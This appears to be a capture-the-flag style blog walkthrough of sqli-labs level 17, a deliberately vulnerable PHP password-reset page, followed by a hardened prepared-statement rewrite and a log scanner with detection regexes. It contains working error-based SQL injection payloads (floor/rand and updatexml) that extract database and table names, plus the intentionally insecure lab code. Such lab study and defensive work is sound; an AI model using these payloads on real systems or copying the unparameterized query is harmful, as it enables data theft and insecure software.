sqli-labs less-17

Posted by 可乐


less-17

uname=admin' #&passwd=a
"
")
')
All of these come back with the same error.


Try a tautology (always-true condition):

uname=a&passwd=a' or 1=1 #

uname=a&passwd=a" or 1=1 #

uname=a&passwd=a') or 1=1 #

uname=a&passwd=a") or 1=1 #

All of them error out as well.

Let's look at the source code.

<?php
// including the mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if (!empty($value))
    {
        // truncation (see comments)
        $value = substr($value, 0, 15);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

// take the variables
if (isset($_POST['uname']) && isset($_POST['passwd']))
{
    // making sure uname is not injectable
    $uname = check_input($_POST['uname']);

    // passwd is taken as-is: there is no check_input() call for it
    $passwd = $_POST['passwd'];

    // logging the connection parameters to a file for analysis.
    $fp = fopen('result.txt', 'a');
    fwrite($fp, 'User Name:' . $uname . "\n");
    fwrite($fp, 'New Password:' . $passwd . "\n");
    fclose($fp);

    // connectivity
    @$sql = "SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if ($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        // passwd is concatenated straight into the UPDATE statement
        $update = "UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";

        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            // the raw MySQL error text is sent back to the client
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }

        echo '<img src="../images/flag1.jpg"   />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg"   />';
        echo "</font>";
    }
}

get_magic_quotes_gpc is used.

name and password are validated separately.

I was overthinking this: this level is a password reset.

Let's first look at what the check_input() function does.

The incoming uname is restricted to 16 characters.

It calls get_magic_quotes_gpc() and escapes ', ", whitespace and /.

passwd gets no processing at all here: it goes straight into the UPDATE statement, and any MySQL error from that statement is printed back to the client.
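The two defects the analysis above points at are the unparameterized UPDATE and the echoed mysql_error(). As an added example (not part of this post and not sqli-labs code), here is the same password-reset handler with both values bound as parameters and database errors kept server-side. It assumes a mysqli connection in a variable named $conn and the lab's users(username, password) table; the password_hash() call is an extra change the post does not discuss.

```php
<?php
// Added example: hardened rewrite of the less-17 handler (not the lab's code).
// Assumes a mysqli connection in $conn and the lab's users(username, password) table.

// Make mysqli throw mysqli_sql_exception instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function reset_password(mysqli $conn, string $uname, string $passwd): bool
{
    try {
        // Look the user up with a bound parameter: no quoting, no truncation, no string concatenation.
        $stmt = $conn->prepare("SELECT username FROM users WHERE username = ? LIMIT 1");
        $stmt->bind_param("s", $uname);
        $stmt->execute();
        $stmt->bind_result($row1);
        $found = $stmt->fetch();
        $stmt->close();
        if (!$found) {
            return false;
        }

        // passwd is bound too, so an updatexml()/floor() string is stored as an odd password, never executed.
        // Storing a hash rather than the plaintext is an additional change not discussed in the post.
        $hash = password_hash($passwd, PASSWORD_DEFAULT);
        $stmt = $conn->prepare("UPDATE users SET password = ? WHERE username = ?");
        $stmt->bind_param("ss", $hash, $row1);
        $stmt->execute();
        $stmt->close();
        return true;
    } catch (mysqli_sql_exception $e) {
        // Error-based extraction relies on the server echoing MySQL errors; log them, do not display them.
        // bin2hex() keeps attacker-controlled text from corrupting the log line.
        error_log("password reset failed for user " . bin2hex($uname) . ": " . $e->getMessage());
        return false;
    }
}

if (isset($_POST['uname'], $_POST['passwd'])) {
    $ok = reset_password($conn, $_POST['uname'], $_POST['passwd']);
    // Same two images the lab uses, but the response no longer carries any database error text.
    echo $ok ? '<img src="../images/flag1.jpg" />' : '<img src="../images/slap1.jpg" />';
}
```

Compared with the original handler, this version also drops the fopen('result.txt') block, which wrote the plaintext new password to a file on the web server; if a record of reset attempts is wanted, log the username and outcome, not the credential.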

 

Here floor() error-based injection can be used:

uname=admin&passwd=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) #

 

updatexml() can also be used to raise the error:

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

Dump the table names:

uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #
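The handler appends every submitted username and password to result.txt as "User Name:" / "New Password:" line pairs, so that file is the natural place to look for the floor() and updatexml() payloads shown above. The following scanner is an added example, not part of the post or of sqli-labs: it reads log text in exactly the format the lab's fwrite() calls produce and reports the lines matching the error-based signatures used in this level. The signature list and the sample log are constructed for the example; a signature match is a triage hint, and the real fix remains the parameterized statement.

```php
<?php
// Added example (not from the post): scan the result.txt written by the less-17 handler
// for the error-based signatures the post demonstrates. The "User Name:" / "New Password:"
// line pairs are the format the lab's fwrite() calls produce.

// Signatures for the techniques shown in the post; these regexes are an assumption, not an exhaustive list.
const ERROR_BASED_SIGNATURES = [
    'updatexml'          => '/\bupdatexml\s*\(/i',
    'floor_rand_groupby' => '/\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b/is',
    'information_schema' => '/\binformation_schema\b/i',
];

/**
 * Return one finding per matching log line:
 * ['line' => n, 'field' => 'User Name'|'New Password', 'signature' => name, 'value' => text]
 */
function scan_result_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\r?\n/', $log) as $i => $line) {
        if (!preg_match('/^(User Name|New Password):(.*)$/', $line, $m)) {
            continue; // not one of the two fields the handler logs
        }
        $field = $m[1];
        $value = $m[2];
        foreach (ERROR_BASED_SIGNATURES as $name => $re) {
            if (preg_match($re, $value)) {
                $findings[] = ['line' => $i + 1, 'field' => $field, 'signature' => $name, 'value' => $value];
                break; // one finding per line is enough
            }
        }
    }
    return $findings;
}

// Constructed sample in the shape the handler writes: a normal reset, then the post's updatexml() payload.
// Note that uname arrives already quoted because check_input() wrapped it in single quotes.
$sample = "User Name:'admin'\n"
        . "New Password:hunter2\n"
        . "User Name:'admin'\n"
        . "New Password:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #\n";

foreach (scan_result_log($sample) as $f) {
    printf("line %d (%s): %s -> %s\n", $f['line'], $f['field'], $f['signature'], $f['value']);
}
```

Run against the sample, only the fourth line is reported, attributed to the updatexml signature and the New Password field. To run it against the lab's own file, pass file_get_contents('result.txt') to scan_result_log() instead of $sample; because check_input() quotes and truncates uname, findings will in practice come from the New Password field, which matches the post's observation that passwd is the unprotected parameter.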

 
